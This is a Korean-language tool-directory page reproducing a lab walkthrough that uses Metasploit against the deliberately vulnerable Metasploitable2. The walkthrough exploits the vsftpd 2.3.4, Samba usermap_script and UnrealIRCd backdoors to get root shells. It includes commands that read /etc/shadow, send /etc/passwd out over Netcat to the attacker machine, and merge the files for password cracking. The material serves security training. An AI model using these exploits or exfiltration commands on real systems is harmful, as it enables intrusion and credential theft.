Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Password CrackingReconnaissanceExploit FrameworksNetwork MappingVulnerability AnalysisExploitationData ExfiltrationPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Learning & Education
Payload Development
Labs & Practice
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Metasploitable2를 대상으로 한 전체 Metasploit 익스플로잇 워크스루 — vsftpd 백도어, Samba CVE-2007-2447, UnrealIRCd 백도어, Netcat 데이터 유출 및 자격 증명 크래킹 준비.

저장소 보기
1개월 전아직 검토되지 않음

Metasploit로 Metasploitable2 공략하기: VSFTPD, Samba, 그리고 그 이상

Metasploit Framework를 활용한 실습형 공격 워크스루입니다. PostgreSQL 데이터베이스 설정과 db_nmap 스캔부터 vsftpd, Samba, UnrealIRCd를 통한 세 개의 root 셸 획득, Netcat을 통한 자격 증명 탈취까지 다룹니다.


개요

이 저장소는 격리된 VirtualBox 실습 환경에서 Metasploitable2를 대상으로 한 전체 Metasploit 공격 과정을 기록합니다. 다루는 주제:

  • PostgreSQL 백엔드와 워크스페이스로 Metasploit 설정
  • 스캔 결과를 데이터베이스에 직접 저장하는 db_nmap 실행
  • vsftpd 2.3.4 백도어 악용 (공급망 손상)
  • Samba CVE-2007-2447 악용 (usermap_script 명령 주입)
  • Netcat으로 /etc/passwd 및 /etc/shadow 탈취 후 unshadow로 병합
  • UnrealIRCd 3.2.8.1 백도어 악용

실습 환경

머신역할IP 주소
Kali Linux 2026.1공격자192.168.1.4
Metasploitable2대상192.168.1.3

네트워크: 192.168.1.0/24 — VirtualBox 내부의 완전히 격리된 NAT 네트워크.


1단계 — Metasploit 설정 및 데이터베이스 기반 스캔

root@kitploit:~
# Start PostgreSQL and initialize the database (one time only)
sudo systemctl start postgresql
sudo msfdb init

# Launch Metasploit
msfconsole

실행 중인 Kali와 Metasploitable2

Kali 업데이트 및 PostgreSQL 시작

root@kitploit:~
msf6> db_status           # Verify: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Confirm active workspace

db_status 및 workspace 출력

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

db_nmap 스캔 진행 중

root@kitploit:~
msf6> hosts
msf6> services

hosts 및 services 출력

Metasploitable2에서 발견된 두 개의 FTP 서버:

포트서비스정보
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

2단계 — vsftpd 2.3.4 악용 (백도어)

2011년 7월, vsftpd 2.3.4 소스 아카이브가 손상되었습니다. FTP 사용자 이름에 :)가 포함되면 포트 6200에서 root 셸을 여는 백도어가 삽입된 것입니다. CVE: CVE-2011-2523. 코드 diff: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# Result: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

vsftpd 익스플로잇 정보 - 1부

vsftpd 익스플로잇 정보 - 2부

vsftpd 옵션 표시

vsftpd RHOSTS RPORT LHOST 설정

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

vsftpd 익스플로잇 실행 및 Meterpreter 세션

원격 root 파일시스템에서 ls 실행

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami root 및 uname -a 출력

해시된 비밀번호 추출:

root@kitploit:~
cat /etc/shadow | grep '$1'

shadow 파일의 해시된 비밀번호


3단계 — Samba CVE-2007-2447 악용

Samba 3.0.0–3.0.25rc3 버전은 인증이 발생하기 전에 username map script 옵션을 통해 사용자 이름 필드의 셸 메타 문자를 /bin/sh로 직접 전달합니다. Metasploitable2는 Samba 3.0.20-Debian을 실행합니다.

root@kitploit:~
msf6> search type:exploit name:samba
# ~7 exploits found

msf6> use exploit/multi/samba/usermap_script
msf6> info

검색으로 찾은 Samba 익스플로잇 목록

Samba usermap_script 정보

Samba CVE 설명 및 참조

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Samba 익스플로잇 실행 - 세션 열림

Samba 셸에서 whoami root 및 smbd --version

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Netcat 파일 탈취

탭 2 — Kali (수신):

root@kitploit:~
nc -l -p 4567 > passwd.txt

탭 1 — 공격 셸 (송신):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Kali에서 passwd를 수신하는 Netcat 리스너

탈취 후 passwd.txt 내용

/etc/shadow에 대해서도 동일하게 반복한 후 병합합니다:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

4단계 — UnrealIRCd 3.2.8.1 악용 (백도어)

UnrealIRCd 3.2.8.1은 소스 코드에 백도어가 포함된 채 배포되었습니다. 포트 6667로 AB를 보내면 서버는 인증 없이 이후의 모든 명령을 root로 실행합니다.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

UnrealIRCd 익스플로잇 옵션 및 실행

UnrealIRCd root 셸 - whoami 및 uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

필수 옵션:

옵션

한눈에 보는 Metasploit 워크플로우

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

자주 하는 실수


핵심 요점

  • vsftpd 2.3.4와 UnrealIRCd 3.2.8.1은 모두 공급망 손상 사례였습니다 — 공식 배포 아카이브에 백도어가 내장된 채 제공
  • Samba의 CVE-2007-2447은 인증 전에 발동합니다 — 패치가 유일한 완화책
  • Netcat은 의존성이 필요 없으며 거의 모든 Unix 시스템에서 파일 탈취에 사용할 수 있습니다
  • exploit 전에 info를 확인하는 습관을 들일 만합니다 — CVE, 영향받는 버전, 필수 옵션을 표시해 줍니다

🌐 나와 연결하기

LinkedIn Dev.to

도구 다운로드
값
설명
RHOSTS192.168.1.3대상 IP
RPORT6667IRC 기본 포트
LHOST192.168.1.4Kali 리스너 IP
payloadcmd/unix/bind_netcatNetcat을 통한 바인드 셸
실수결과해결책
msfdb init 건너뛰기데이터베이스 없음 — 스캔 결과가 저장되지 않음첫 사용 전에 sudo msfdb init를 한 번 실행
LHOST를 설정하지 않음리버스 셸이 콜백할 곳이 없음항상 LHOST를 Kali IP로 설정
세션마다 msfdb init 실행기존 데이터를 덮어씀한 번만 실행; sudo msfdb status로 확인
잘못된 RPORT공격이 조용히 실패함설정 전에 services에서 포트 확인
Netcat 리스너를 너무 일찍 종료파일 전송이 잘림파이프 명령 후 CTRL-C 전에 잠시 대기
unshadow 건너뛰기암호 크래커가 분할 파일 형식을 거부함항상 passwd + shadow를 먼저 병합